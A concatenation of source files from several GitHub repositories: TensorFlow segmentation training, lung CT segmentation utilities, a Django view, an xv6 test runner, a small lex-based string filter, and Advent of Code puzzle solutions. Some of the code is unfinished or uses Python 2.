(-dilate, -dilate)) return v try: os.remove('dsb2018.db') except: pass db = picpac.Writer('dsb2018.db') logging.warn("Importing images into PicPac database...") for folder in glob(os.path.join(DATA_DIR, "stage1_train/*")): print(folder) sample = Sample(folder) sample.stat() image_buffer = cv2.imencode('.png', sample.image)[1].tostring() mask = np.clip(sample.mask_sum(), 0, 1).astype(np.uint8) mask_buffer = cv2.imencode('.png', mask)[1].tostring() db.append(image_buffer, mask_buffer) del db #print(folder) sp.check_call('./fcn-train.py --db dsb2018.db --model dsb2018.model --annotate image') ``` #### File: aaalgo/picpac-demos/fcn-train.py ```python from __future__ import absolute_import, division, print_function import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' import time from tqdm import tqdm import numpy as np import cv2 import tensorflow as tf import picpac import fcn_nets as nets flags = tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('db', 'db', 'training db') flags.DEFINE_string('val_db', None, 'validation db') flags.DEFINE_integer('classes', 2, 'number of classes') flags.DEFINE_string('mixin', None, 'mix-in training db') flags.DEFINE_string('annotate', 'json', 'json or image') flags.DEFINE_integer('channels', 3, '') flags.DEFINE_integer('max_size', None, '') flags.DEFINE_string('net', 'resnet_v1_50', 'architecture') flags.DEFINE_string('model', 'fcn_model', 'model directory') flags.DEFINE_string('resume', None, 'resume training from this model') flags.DEFINE_integer('max_to_keep', 100, '') # optimizer settings flags.DEFINE_float('learning_rate', 0.0001, 'Initial learning rate.') flags.DEFINE_float('decay_rate', 0.9, '') flags.DEFINE_float('decay_steps', 10000, '') # flags.DEFINE_integer('max_steps', 200000, '') flags.DEFINE_integer('epoch_steps', 100, '') flags.DEFINE_integer('ckpt_epochs', 100, '') flags.DEFINE_integer('val_epochs', 100, '') def fcn_loss (logits, labels): labels = tf.to_int32(labels) logits = tf.reshape(logits, (-1, FLAGS.classes)) labels = tf.reshape(labels, (-1,)) xe = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=labels) xe = tf.reduce_mean(xe, name='xe') acc = tf.cast(tf.nn.in_top_k(logits, labels, 1), tf.float32) acc = tf.reduce_mean(acc, name='acc') # optimize for cross-entropy # display cross entropy and accuracy return xe, [xe, acc] def main (_): try: os.makedirs(FLAGS.model) except: pass X = tf.placeholder(tf.float32, shape=(None, None, None, FLAGS.channels), name="images") # ground truth labels Y = tf.placeholder(tf.float32, shape=(None, None, None, 1), name="labels") is_training = tf.placeholder(tf.bool, name="is_training") # load network logits, stride = getattr(nets, FLAGS.net)(X, is_training, FLAGS.classes) loss, metrics = fcn_loss(logits, Y) metric_names = [x.name[:-2] for x in metrics] global_step = tf.Variable(0, name='global_step', trainable=False) rate = FLAGS.learning_rate rate = tf.train.exponential_decay(rate, global_step, FLAGS.decay_steps, FLAGS.decay_rate, staircase=True) optimizer = tf.train.AdamOptimizer(rate) train_op = optimizer.minimize(loss, global_step=global_step) init = tf.global_variables_initializer() saver = tf.train.Saver(max_to_keep=FLAGS.max_to_keep) picpac_config = dict(seed=2017, cache=True, # set to False for large datasets shuffle=True, reshuffle=True, batch=1, round_div=stride, annotate=FLAGS.annotate, # json by default channels=FLAGS.channels, # 3 by default stratify=True, pert_colorspace='SAME', # do not change colorspace # which typically means BGR # or HSV or Lab pert_color1=20, pert_color2=20, pert_color3=20, pert_angle=20, pert_min_scale=0.9, pert_max_scale=1.2, pert_hflip=True, pert_vflip=True, channel_first=False # this is tensorflow specific # Caffe's dimension order is different. ) if not FLAGS.mixin is None: assert os.path.exists(FLAGS.mixin) picpac_config['mixin'] = FLAGS.mixin picpac_config['mixin_group_delta'] = 1 pass if not FLAGS.max_size is None: config['max_size'] = FLAGS.max_size # load training db assert FLAGS.db and os.path.exists(FLAGS.db) stream = picpac.ImageStream(FLAGS.db, perturb=True, loop=True, **picpac_config) # load validation db val_stream = None if FLAGS.val_db: assert os.path.exists(FLAGS.val_db) val_stream = picpac.ImageStream(FLAGS.val_db, perturb=False, loop=False, **picpac_config) config = tf.ConfigProto() config.gpu_options.allow_growth=True with tf.Session(config=config) as sess: sess.run(init) if FLAGS.resume: saver.restore(sess, FLAGS.resume) step = 0 epoch = 0 global_start_time = time.time() while step < FLAGS.max_steps: start_time = time.time() avg = np.array([0] * len(metrics), dtype=np.float32) for _ in tqdm(range(FLAGS.epoch_steps), leave=False): images, labels, _ = stream.next() feed_dict = {X: images, Y: labels, is_training: True} mm, _, = sess.run([metrics, train_op, ], feed_dict=feed_dict) avg += np.array(mm) pass step += FLAGS.epoch_steps avg /= FLAGS.epoch_steps stop_time = time.time() txt = ', '.join(['%s=%.4f' % (a, b) for a, b in zip(metric_names, list(avg))]) print('step %d: elapsed=%.4f time=%.4f, %s' % (step, (stop_time - global_start_time), (stop_time - start_time), txt)) epoch += 1 # validation if epoch and (epoch % FLAGS.val_epochs == 0) and not val_stream is None: # evaluation val_stream.reset() avg = np.array([0] * len(metrics), dtype=np.float32) C = 0 for images, labels, _ in val_stream: feed_dict = {X: images, Y: labels, is_training: False} mm = sess.run(metrics, feed_dict=feed_dict) avg += np.array(mm) C += 1 pass avg /= C txt = ', '.join(['%s=%.4f' % (a, b) for a, b in zip(metric_names, list(avg))]) print('step %d, validation: %s' % (step, txt)) # model saving if epoch and (epoch % FLAGS.ckpt_epochs == 0): ckpt_path = '%s/%d' % (FLAGS.model, step) saver.save(sess, ckpt_path) print('step %d, saving to %s.' % (step, ckpt_path)) pass pass pass if __name__ == '__main__': tf.app.run() ```
{ "source": "aaalgo/plumo", "score": 2 }
#### File: plumo/src/adsb3.py ```python from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import sys sys.path.append('build/lib.linux-x86_64-2.7') import shutil import math from glob import glob import cv2 import csv import random from PIL import Image, ImageDraw import dicom import copy import numpy as np import SimpleITK as itk from skimage import measure import logging import cPickle as pickle import plumo # configuration options DICOM_STRICT = False SPACING = 0.8 GAP = 5 FAST = 400 if 'SPACING' in os.environ: SPACING = float(os.environ['SPACING']) print('OVERRIDING SPACING = %f' % SPACING) if 'GAP' in os.environ: GAP = int(os.environ['GAP']) print('OVERRIDING GAP = %d' % GAP) ROOT = os.path.abspath(os.path.dirname(__file__)) DATA_DIR = os.path.join(ROOT, 'data', 'adsb3') # parse label file, return a list of (id, label) # if gs is True, labels are int # otherwise, labels are float def load_meta (path, gs=True): all = [] with open(path, 'r') as f: header = f.next() # skip one line assert header.strip() == 'id,cancer' for l in f: ID, label = l.strip().split(',') if gs: label = int(label) else: label = float(label) all.append((ID, label)) pass pass return all # write meta for verification def dump_meta (path, meta): with open(path, 'w') as f: f.write('id,cancer\n') for ID, label in meta: f.write('%s,%s\n' % (ID, str(label))) pass pass STAGE1_TRAIN = load_meta(os.path.join(DATA_DIR, 'stage1_labels.csv')) STAGE1_PUBLIC = load_meta(os.path.join(DATA_DIR, 'stage1_public.csv')) STAGE2_PUBLIC = load_meta(os.path.join(DATA_DIR, 'stage2_public.csv')) STAGE2_PRIVATE = load_meta(os.path.join(DATA_DIR, 'stage2_private.csv')) ALL_CASES = STAGE1_TRAIN + STAGE1_PUBLIC + STAGE2_PUBLIC + STAGE2_PRIVATE # All DiCOMs of a UID, organized class Case (plumo.DicomVolume): def __init__ (self, uid, regroup = True): path = os.path.join(DATA_DIR, 'dicom', uid) plumo.DicomVolume.__init__(self, path) self.uid = uid self.path = path pass pass def save_mask (path, mask): shape = np.array(list(mask.shape), dtype=np.uint32) total = mask.size totalx = (total +7 )// 8 * 8 if totalx == total: padded = mask else: padded = np.zeros((totalx,), dtype=np.uint8) padded[:total] = np.reshape(mask, (total,)) pass padded = np.reshape(padded, (totalx//8, 8)) #print padded.shape packed = np.packbits(padded) #print packed.shape np.savez_compressed(path, shape, packed) pass def load_mask (path): import sys saved = np.load(path) shape = saved['arr_0'] D, H, W = shape size = D * H * W packed = saved['arr_1'] padded = np.unpackbits(packed) binary = padded[:size] return np.reshape(binary, [D, H, W]) def load_8bit_lungs_noseg (uid): case = Case(uid) case.normalize_8bit() return case def load_16bit_lungs_noseg (uid): case = Case(uid) case.normalize_16bit() return case def load_lungs_mask (uid): cache = os.path.join('maskcache/mask-v2/%s.npz' % case.uid) binary = None if os.path.exists(cache) and os.path.getsize(cache) > 0: # load cache binary = load_mask(cache) assert not binary is None if binary is None: case = load_case(uid) case.normalizeHU() binary = segment_lung_axial_v2(case.images) #, th=200.85) save_mask(cache, binary) pass return binary def load_fts (path): with open(path, 'rb') as f: return pickle.load(f) pass def patch_clip_range (x, tx, wx, X): if x < 0: # wx += x tx -= x x = 0 if x + wx > X: d = x + wx - X wx -= d pass return x, tx, wx def extract_patch_3c (images, z, y, x, size): assert len(images.shape) == 3 _, Y, X = images.shape z = int(round(z)) y = int(round(y)) x = int(round(x)) image = get3c(images, z) if image is None: return None ty = 0 tx = 0 y -= size//2 x -= size//2 wy = size wx = size #print y, ty, wy, x, tx, wx y, ty, wy = patch_clip_range(y, ty, wy, Y) x, tx, wx = patch_clip_range(x, tx, wx, X) # now do overlap patch = np.zeros((size, size, 3), dtype=image.dtype) #print y, ty, wy, x, tx, wx patch[ty:(ty+wy),tx:(tx+wx),:] = image[y:(y+wy),x:(x+wx),:] return patch def try_mkdir (path): try: os.makedirs(path) except: pass def try_remove (path): try: os.remove(path) except: shutil.rmtree(path, ignore_errors=True) pass if __name__ == '__main__': #dump_meta('a', STAGE1.train) #dump_meta('b', STAGE1.test) pass ``` #### File: plumo/src/mesh.py ```python import sys import time import numpy as np import cv2 import skimage from skimage import measure from scipy.ndimage.morphology import grey_dilation, binary_dilation, binary_fill_holes #from skimage import regionprops import scipy from adsb3 import * def pad (images, padding=2, dtype=None): Z, Y, X = images.shape if dtype is None: dtype = images.dtype out = np.zeros((Z+padding*2, Y+padding*2, X+padding*2), dtype=dtype) out[padding:(Z+padding),padding:(Y+padding),padding:(X+padding)] = images return out def segment_body (image, smooth=1, th=-300): blur = scipy.ndimage.filters.gaussian_filter(image, smooth, mode='constant') binary = np.array(blur < th, dtype=np.uint8) # body is a rough region covering human body body = np.zeros_like(binary) for i, sl in enumerate(binary): #H, W = sl.shape ll = measure.label(sl, background=1) # connected components # biggest CC should be body pp = measure.regionprops(ll) boxes = [(x.area, x.bbox, x.filled_image) for x in pp if x.label != 0] # label 0 is air boxes = sorted(boxes, key = lambda x: -x[0]) if len(boxes) == 0: continue y0, x0, y1, x1 = boxes[0][1] body[i,y0:y1,x0:x1] = boxes[0][2] pass return body, None def fill_convex (image): H, W = image.shape padded = np.zeros((H+20, W+20), dtype=np.uint8) padded[10:(10+H),10:(10+W)] = image contours = measure.find_contours(padded, 0.5) if len(contours) == 0: return image if len(contours) == 1: contour = contours[0] else: contour = np.vstack(contours) cc = np.zeros_like(contour, dtype=np.int32) cc[:,0] = contour[:, 1] cc[:,1] = contour[:, 0] hull = cv2.convexHull(cc) contour = hull.reshape((1, -1, 2)) cv2.fillPoly(padded, contour, 1) return padded[10:(10+H),10:(10+W)] def segment_lung (image, smooth=1, th=-300): padding_value = np.min(image) if padding_value < -1010: padding = [image == padding_value] else: padding = None imagex = image if padding: imagex = np.copy(image) imagex[padding] = 0 blur = scipy.ndimage.filters.gaussian_filter(imagex, smooth, mode='constant') if padding: blur[padding] = padding_value binary = np.array(blur < th, dtype=np.uint8) # body is a rough region covering human body body = np.zeros_like(binary) for i, sl in enumerate(binary): #H, W = sl.shape ll = measure.label(sl, background=1) # connected components # biggest CC should be body pp = measure.regionprops(ll) boxes = [(x.area, x.bbox, x.filled_image) for x in pp if x.label != 0] # label 0 is air boxes = sorted(boxes, key = lambda x: -x[0]) if len(boxes) == 0: print 'no body detected' continue y0, x0, y1, x1 = boxes[0][1] body[i,y0:y1,x0:x1] = fill_convex(boxes[0][2]) pass binary *= body if False: padding = np.min(image) if padding < -1010: binary[image == padding] = 0 # 0: body # 1: air & lung labels = measure.label(binary, background=1) # set air (same cc as corners) -> body bg_labels = set() # 8 corders of the image for z in [0, -1]: for y in [0, -1]: for x in [0, -1]: bg_labels.add(labels[z, y, x]) print bg_labels bg_labels = list(bg_labels) for bg_label in bg_labels: binary[bg_label == labels] = 0 pass # now binary: # 0: non-lung & body tissue in lung & air # 1: lung & holes in body #inside = np.copy(binary) # now binary: # 0: non-lung & body tissue in lung # 1: lung & holes in body binary = np.swapaxes(binary, 0, 1) for i, sl in enumerate(binary): #H, W = sl.shape ll = measure.label(sl, background=1) # connected components # biggest CC should be body vv, cc = np.unique(ll, return_counts=True) cc[0] = 0 assert len(vv) > 0 body_ll = vv[np.argmax(cc)] binary[i][ll != body_ll] = 1 pass binary = np.swapaxes(binary, 0, 1) if padding: binary[padding] = 0 binary *= body # binary 0: body # 1: - anything inside lung # - holes in body # - possibly image corners # # inside 0: non-lung & air # body tissue in lung # 1: lung # set corner again labels = measure.label(binary, background=0) bg_labels = set([0]) for z in [0, -1]: for y in [0, -1]: for x in [0, -1]: bg_labels.add(labels[z, y, x]) #print 'bg', bg_labels val_counts = zip(*np.unique(labels, return_counts=True)) val_counts = [x for x in val_counts if (not x[0] in bg_labels) and (x[1] >= 10)] val_counts = sorted(val_counts, key=lambda x:-x[1])[:100] # sort by size body_counts = [c for _, c in val_counts] print val_counts binary = np.zeros_like(binary, dtype=np.uint8) print val_counts[0][0] binary[labels == val_counts[0][0]] = 1 #for v, _ in val_counts[0:5]: # binary[labels == v] = 1 if len(val_counts) > 1: if val_counts[1][1] * 3 > val_counts[0][1]: #binary[labels == val_counts[1][0]] = 1 #if val_counts[1][1] * 4 > val_counts[0][1]: logging.warn('more than 2 lungs parts detected') # remove upper part of qiguan last = binary.shape[0] - 1 for ri in range(binary.shape[0]): #H, W = sl.shape i = last - ri ll = measure.label(binary[i], background=0) # connected components nl = np.unique(ll) if len(nl) <= 2: binary[i,:,:] = 0 else: print 'removed %d slices' % ri break pass return binary, body_counts #, inside def convex_hull (binary): swap_sequence = [(0, 1), # 102 (0, 2), # 201 (0, 2)] # 102 output = np.ndarray(binary.shape, dtype=binary.dtype) for swp1, swp2 in swap_sequence: N = binary.shape[0] print 'shape', binary.shape for i in range(N): contours = measure.find_contours(binary[i], 0.5) if len(contours) == 0: continue if len(contours) == 1: contour = contours[0] else: contour = np.vstack(contours) cc = np.zeros_like(contour, dtype=np.int32) cc[:,0] = contour[:, 1] cc[:,1] = contour[:, 0] hull = cv2.convexHull(cc) contour = hull.reshape((1, -1, 2)) cv2.fillPoly(binary[i], contour, 1) #binary[i] = skimage.morphology.convex_hull_image(binary[i]) pass print 'swap', swp1, swp2 nb = np.swapaxes(binary, swp1, swp2) binary = np.ndarray(nb.shape, dtype=nb.dtype) binary[:,:] = nb[:,:] pass binary = np.swapaxes(binary, 0, 1) output[:,:] = binary[:,:] return output; #binary = binary_dilation(output, iterations=dilate) #return binary def segment_lung_internal (image, smooth=1, th=-300): padding_value = np.min(image) if padding_value < -1010: padding = [image == padding_value] else: padding = None imagex = image if padding: imagex = np.copy(image) imagex[padding] = 0 blur = scipy.ndimage.filters.gaussian_filter(imagex, smooth, mode='constant') if padding: blur[padding] = padding_value binary = np.array(blur < th, dtype=np.uint8) #not_slid = np.array(blur < th, dtype=np.uint8) not_solid = np.copy(binary) # body is a rough region covering human body body = np.zeros_like(binary) for i, sl in enumerate(binary): #H, W = sl.shape ll = measure.label(sl, background=1) # connected components # biggest CC should be body pp = measure.regionprops(ll) boxes = [(x.area, x.bbox, x.filled_image) for x in pp if x.label != 0] # label 0 is air boxes = sorted(boxes, key = lambda x: -x[0]) if len(boxes) == 0: print 'no body detected' continue y0, x0, y1, x1 = boxes[0][1] body[i,y0:y1,x0:x1] = fill_convex(boxes[0][2]) pass binary *= body if False: padding = np.min(image) if padding < -1010: binary[image == padding] = 0 # 0: body # 1: air & lung labels = measure.label(binary, background=1) # set air (same cc as corners) -> body bg_labels = set() # 8 corders of the image for z in [0, -1]: for y in [0, -1]: for x in [0, -1]: bg_labels.add(labels[z, y, x]) print bg_labels bg_labels = list(bg_labels) for bg_label in bg_labels: binary[bg_label == labels] = 0 pass # now binary: # 0: non-lung & body tissue in lung & air # 1: lung & holes in body #inside = np.copy(binary) # now binary: # 0: non-lung & body tissue in lung # 1: lung & holes in body binary = np.swapaxes(binary, 0, 1) for i, sl in enumerate(binary): #H, W = sl.shape ll = measure.label(sl, background=1) # connected components # biggest CC should be body vv, cc = np.unique(ll, return_counts=True) cc[0] = 0 assert len(vv) > 0 body_ll = vv[np.argmax(cc)] binary[i][ll != body_ll] = 1 pass binary = np.swapaxes(binary, 0, 1) if padding: binary[padding] = 0 binary *= body # binary 0: body # 1: - anything inside lung # - holes in body # - possibly image corners # # inside 0: non-lung & air # body tissue in lung # 1: lung # set corner again labels = measure.label(binary, background=0) bg_labels = set([0]) for z in [0, -1]: for y in [0, -1]: for x in [0, -1]: bg_labels.add(labels[z, y, x]) #print 'bg', bg_labels val_counts = zip(*np.unique(labels, return_counts=True)) val_counts = [x for x in val_counts if (not x[0] in bg_labels) and (x[1] >= 10)] val_counts = sorted(val_counts, key=lambda x:-x[1])[:100] # sort by size body_counts = [c for _, c in val_counts] print val_counts binary = np.zeros_like(binary, dtype=np.uint8) print val_counts[0][0] binary[labels == val_counts[0][0]] = 1 #for v, _ in val_counts[0:5]: # binary[labels == v] = 1 if len(val_counts) > 1: if val_counts[1][1] * 3 > val_counts[0][1]: #binary[labels == val_counts[1][0]] = 1 #if val_counts[1][1] * 4 > val_counts[0][1]: logging.warn('more than 2 lungs parts detected') # remove upper part of qiguan last = binary.shape[0] - 1 for ri in range(binary.shape[0]): #H, W = sl.shape i = last - ri ll = measure.label(binary[i], background=0) # connected components nl = np.unique(ll) if len(nl) <= 2: binary[i,:,:] = 0 else: print 'removed %d slices' % ri break pass #not_solid = np.logical_and(not_solid, binary) # solid within lung return np.logical_and(not_solid, binary), body_counts #, inside ```
{ "source": "aaalgo/seriescope", "score": 2 }
#### File: seriescope/web/views.py ```python from django.shortcuts import render from django.contrib.auth.decorators import login_required # Create your views here. @login_required def viewer (request): #patient = Patient.objects.get(directory=key) user = request.user._wrapped.__dict__ ''' patient_id = request.GET.get('patient_id', -1) #print(user) del user['_state'] del user['last_login'] del user['date_joined'] context = {'fix_patient_id': patient_id, 'user': user } ''' context = {} return render(request, 'web/viewer.html', context) ```
{ "source": "aaalgo/streamer", "score": 3 }
#### File: aaalgo/streamer/test.py ```python import sys sys.path.append('build/lib.linux-x86_64-' + sys.version[:3]) import cpp def generator (): for i in range(1000): yield i stream = cpp.Streamer(generator(), 4); while True: v = next(stream) if v is None: break print(v) ```
{ "source": "aaalgo/tfgraph", "score": 2 }
#### File: aaalgo/tfgraph/rfsize.py ```python from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import sys os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' import time import logging import argparse from toposort import toposort import tensorflow as tf class TFGraph(object): def __init__ (self, model): graph = tf.Graph() params = {} deps = {} with graph.as_default(): saver = tf.train.import_meta_graph(model + '.meta') graph_def = graph.as_graph_def() saver = tf.train.Saver() init = tf.global_variables_initializer() config = tf.ConfigProto() config.gpu_options.allow_growth=True with tf.Session(config=config) as sess: sess.run(init) saver.restore(sess, model) # scan the nodes for node in graph_def.node: name = node.name deps[name] = set(node.input) if 'Backprop' in name: # skip backprop ones continue if 'gradients' in name: continue attr = {} for key in ['padding', 'ksize', 'strides']: if key in node.attr: attr[key] = node.attr[key] if (not ('ksize' in attr)) and len(attr) == 2: # it's likely we have ve hit a Conv2D op, try to find ksize by # actually loading the weighting if len(node.input) < 2 or not ('/read' in node.input[1]): print(node.name) print(node.op) print(node.input) raise Exception('xx') W_name = node.input[1] + ':0' W = graph.get_tensor_by_name(W_name) w, = sess.run([W]) K1, K2, _, _ = w.shape attr['ksize'] = [1, K1, K2, 1] elif 'ksize' in attr: attr['ksize'] = [int(i) for i in attr['ksize'].list.i] if 'padding' in attr: attr['padding'] = attr['padding'].s if 'strides' in attr: attr['strides'] = [int(i) for i in attr['strides'].list.i] if not (len(attr) == 0 or len(attr) == 3): print("node %s of type %s is funny, we cannot support it!" % (node.name, node.op)) print(attr) sys.exit(1) pass if len(attr) != 3: continue attr['op'] = node.op params[name] = attr pass pass pass self.params = params self.deps = deps pass def sort_convlike (self): v = [] for group in toposort(self.deps): group = [x for x in group if x in self.params] if len(group) > 2: logging.error('non-serial graph, groups=%s' % group) raise Except() if len(group) == 0: continue name = group[0] param = self.params[name] #print('%s: %s' % (name, param['op'])) ksize = param['ksize'] strides = param['strides'] padding = param['padding'] #print('\tksize=%s, strides=%s, padding=%s' % (ksize, strides, padding)) v.append((name, param['op'], ksize, strides, padding)) return v pass if __name__ == '__main__': parser = argparse.ArgumentParser(prog='PROG') parser.add_argument('--model', default='model/20000', help='model') args = parser.parse_args() graph = TFGraph(args.model) ops = graph.sort_convlike() ops.reverse() rf = 1 not_started = True for name, op, ksize, strides, padding in ops: assert op in ['Conv2DBackpropInput', 'Conv2D', 'MaxPool'] if op == 'Conv2DBackpropInput': assert not_started continue not_started = False _, K1, K2, _ = ksize _, S1, S2, _ = strides print('%s: %s ksize=%s stride=%s => %d' % ( name, op, K1, S1, rf)) assert K1 == K2 assert S2 == S2 rf = (rf - 1) * S1 + K1 pass print("Receptive field: %d" % rf) ```
{ "source": "aaamber/cs537", "score": 2 }
#### File: cs537/4b/project4b.py ```python import sys, os, inspect import toolspath from testing import Xv6Test, Xv6Build curdir = os.path.realpath(os.path.dirname(inspect.getfile(inspect.currentframe()))) def get_description(name): cfile = os.path.join(curdir, 'tests', name+'.c') with open(cfile, 'r') as f: desc = f.readline() desc = desc.strip() desc = desc[2:] if desc[-2:] == '*/': desc = desc[:-2] return desc.strip() test_values = { 'clone': 9, 'clone2': 6, 'clone3': 3, 'badclone': 6, 'stack': 8, 'join': 9, 'join2': 6, 'join3': 3, 'join4': 3, 'thread': 10, 'thread2': 7, 'multi': 8, 'locks': 8, 'noexit': 7, 'size' : 7, } all_tests = [] build_test = Xv6Build for testname in test_values.keys(): members = { 'name': testname, 'tester': 'tests/' + testname + '.c', 'description': get_description(testname), 'timeout': 10, 'point_value' : test_values[testname] } newclass = type(testname, (Xv6Test,), members) all_tests.append(newclass) setattr(sys.modules[__name__], testname, newclass) class usertests(Xv6Test): name = 'usertests' tester = 'tests/usertests.c' description = get_description('usertests') timeout = 240 #all_tests.append(usertests) from testing.runtests import main main(build_test, all_tests) ```
{ "source": "aaa-ncnu-ie/card.io-iOS-source", "score": 2 }
#### File: string_scripts/swedish_chef/swedish_chef.py ```python import os import re import sys import subprocess # Use the official chef lex file # Compile from source each time path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'swedish_chef.l') COMPILE_CMD = "lex -o /tmp/swedish_chef.c {0} && cc /tmp/swedish_chef.c -o /tmp/swedish_chef -ll".format(path) subprocess.Popen(COMPILE_CMD, stdout=subprocess.PIPE, shell=True).wait() RUN_CMD = "/tmp/swedish_chef" def filter(text): """ >>> filter("Turn flash on.") 'Toorn flesh oon.' >>> filter("Cancel") 'Cuncel' >>> filter("card.io") 'cerd.iu' """ p = subprocess.Popen(RUN_CMD, stdout=subprocess.PIPE, stdin=subprocess.PIPE) stdout, stderr = p.communicate(input=text) return stdout if __name__ == "__main__": import doctest doctest.testmod() ```
{ "source": "aaandri98/AdventOfCode2020", "score": 3 }
#### File: AdventOfCode2020/day13/main.py ```python import os import sys import time from utility.file_reader import read_file from utility.parser import convert_to_int def filter_values(val): return val.isnumeric() def part_1(value_list, timestamp=1000340): value_list = list(filter(filter_values, value_list.split(','))) value_list = convert_to_int(value_list) best = sys.maxsize to_return = 0 for idx in range(len(value_list)): if value_list[idx] - (timestamp % value_list[idx]) < best: to_return = value_list[idx] best = value_list[idx] - (timestamp % value_list[idx]) return best * to_return def part_2(value_list, timestamp=1000340): value_list = (value_list.split(',')) okay = False counter = value_list[0] while not okay: for idx, val in enumerate(value_list): if val is not 'x': return okay = True return if __name__ == '__main__': dir_path = os.path.dirname(os.path.realpath(__file__)) input_read = read_file(dir_path + "/" + "input1.txt", "\n") start_time = time.time() print('part 1:', part_1(input_read[1])) print("--- %s seconds ---" % (time.time() - start_time), "\n") start_time = time.time() print('part 2:', part_2(input_read[1])) print("--- %s seconds ---" % (time.time() - start_time), "\n") ``` #### File: AdventOfCode2020/day16/main.py ```python import math import numbers import os import re import sys import time from collections import defaultdict from utility.file_reader import read_file from utility.parser import convert_to_int fields = { 'departure location': lambda x: 25 <= x <= 80 or 90 <= x <= 961, 'departure station': lambda x: 41 <= x <= 133 or 148 <= x <= 968, 'departure platform': lambda x: 48 <= x <= 425 or 451 <= x <= 952, 'departure track': lambda x: 25 <= x <= 371 or 384 <= x <= 966, 'departure date': lambda x: 49 <= x <= 531 or 546 <= x <= 973, 'departure time': lambda x: 45 <= x <= 641 or 656 <= x <= 954, 'arrival location': lambda x: 43 <= x <= 357 or 364 <= x <= 969, 'arrival station': lambda x: 40 <= x <= 669 or 689 <= x <= 954, 'arrival platform': lambda x: 40 <= x <= 550 or 570 <= x <= 956, 'arrival track': lambda x: 49 <= x <= 854 or 863 <= x <= 953, 'class': lambda x: 48 <= x <= 601 or 614 <= x <= 964, 'duration': lambda x: 27 <= x <= 698 or 715 <= x <= 962, 'price': lambda x: 38 <= x <= 781 or 800 <= x <= 970, 'route': lambda x: 47 <= x <= 824 or 842 <= x <= 965, 'row': lambda x: 45 <= x <= 219 or 241 <= x <= 955, 'seat': lambda x: 47 <= x <= 388 or 401 <= x <= 954, 'train': lambda x: 42 <= x <= 906 or 919 <= x <= 965, 'type': lambda x: 40 <= x <= 726 or 733 <= x <= 955, 'wagon': lambda x: 27 <= x <= 161 or 174 <= x <= 974, 'zone': lambda x: 48 <= x <= 103 or 110 <= x <= 954 } def part_1(value_list, scan_error=0): if len(value_list) == 0: return scan_error to_check = convert_to_int(value_list[0].split(',')) for val in range(len(to_check)): found = False for k in fields: if fields.get(k, lambda x: False)(to_check[val]): found = True break if not found: scan_error += to_check[val] return part_1(value_list[1:], scan_error) def part_2(value_list, value_list_parsed=None): if value_list_parsed is None: value_list_parsed = [] if len(value_list) == 0: final = [] for idx in range(len(value_list_parsed[0])): partial = [] for idx2 in range(len(value_list_parsed)): partial.append(value_list_parsed[idx2][idx]) final.append(partial) keys = defaultdict(list) for idx3 in range(len(final)): for k in fields: found = True for val in range(len(final[idx3])): if not fields.get(k, lambda x: False)(final[idx3][val]): found = False break if found: if not keys[idx3]: to_append = [] else: to_append = keys[idx3] keys[idx3] = [*to_append, k] has_finished = False already_done = [] while not has_finished: for k in keys: if k not in already_done and len(keys[k]) == 1: already_done.append(k) for k2 in keys: if k is not k2 and keys[k][0] in keys[k2]: keys[k2].remove(keys[k][0]) for k_idx in keys: if len(keys[k_idx]) > 1: has_finished = False break else: has_finished = True input_read = read_file(dir_path + "/" + "my.txt", ",") input_read = convert_to_int(input_read) total = 1 for k in keys: if 'departure' in keys[k][0]: total *= input_read[k] return total to_check = convert_to_int(value_list[0].split(',')) for val in range(len(to_check)): found = False for k in fields: if fields.get(k, lambda x: False)(to_check[val]): found = True break if not found: return part_2(value_list[1:], value_list_parsed) value_list_parsed.append(to_check) return part_2(value_list[1:], value_list_parsed) if __name__ == '__main__': dir_path = os.path.dirname(os.path.realpath(__file__)) input_read = read_file(dir_path + "/" + "nearby.txt", "\n") start_time = time.time() print('part 1:', part_1(input_read)) print("--- %s seconds ---" % (time.time() - start_time), "\n") start_time = time.time() print('part 2:', part_2(input_read)) print("--- %s seconds ---" % (time.time() - start_time), "\n") ``` #### File: AdventOfCode2020/day3/main.py ```python import os import time from utility.file_reader import read_file from utility.parser import convert_to_int def path_traversal(value_list, right_step, down_step): path_idx = 0 counter = 0 path_length = len(value_list[0]) for idx, value in enumerate(value_list): if idx % down_step == 0: single_path = value tree_or_space = single_path[path_idx] if tree_or_space == '#': counter += 1 path_idx += right_step if path_idx >= path_length: path_idx = path_idx % path_length return counter def part_1(value_list): right_3_down_1 = path_traversal(value_list, 3, 1) return right_3_down_1 def part_2(value_list): right_1_down_1 = path_traversal(value_list, 1, 1) right_3_down_1 = path_traversal(value_list, 3, 1) right_5_down_1 = path_traversal(value_list, 5, 1) right_7_down_1 = path_traversal(value_list, 7, 1) right_1_down_2 = path_traversal(value_list, 1, 2) return right_1_down_1 * right_1_down_2 * right_3_down_1 * right_5_down_1 * right_7_down_1 if __name__ == '__main__': dir_path = os.path.dirname(os.path.realpath(__file__)) input_read = read_file(dir_path + "/" + "input1.txt") start_time = time.time() print('part 1:', part_1(input_read)) print("--- %s seconds ---" % (time.time() - start_time), "\n") start_time = time.time() print('part 2:', part_2(input_read)) print("--- %s seconds ---" % (time.time() - start_time), "\n") ``` #### File: AdventOfCode2020/day9/main.py ```python import math import os import re import time from utility.file_reader import read_file from utility.parser import convert_to_int from utility.search import binary_search_recursive def part_1(value_list): partial = value_list[:26] to_count = value_list[26] partial.sort() found = False for idx in range(len(partial)): diff = to_count - partial[idx] if binary_search_recursive(partial, diff, 0, len(partial) - 1) != -1: found = True break if found: return part_1(value_list[1:]) else: return to_count def part_2(value_list): counter = 0 idx = 0 while counter < 393911906: counter += value_list[idx] idx += 1 if counter == 393911906: partial = value_list[:idx] partial.sort() return partial[0] + partial[len(partial) - 1] else: return part_2(value_list[1:]) if __name__ == '__main__': dir_path = os.path.dirname(os.path.realpath(__file__)) input_read = read_file(dir_path + "/" + "input1.txt", "\n") input_read = convert_to_int(input_read) start_time = time.time() print('part 1:', part_1(input_read)) print("--- %s seconds ---" % (time.time() - start_time), "\n") start_time = time.time() print('part 2:', part_2(input_read)) print("--- %s seconds ---" % (time.time() - start_time), "\n") ```
{ "source": "aaandri98/AdventOfCode2021", "score": 3 }
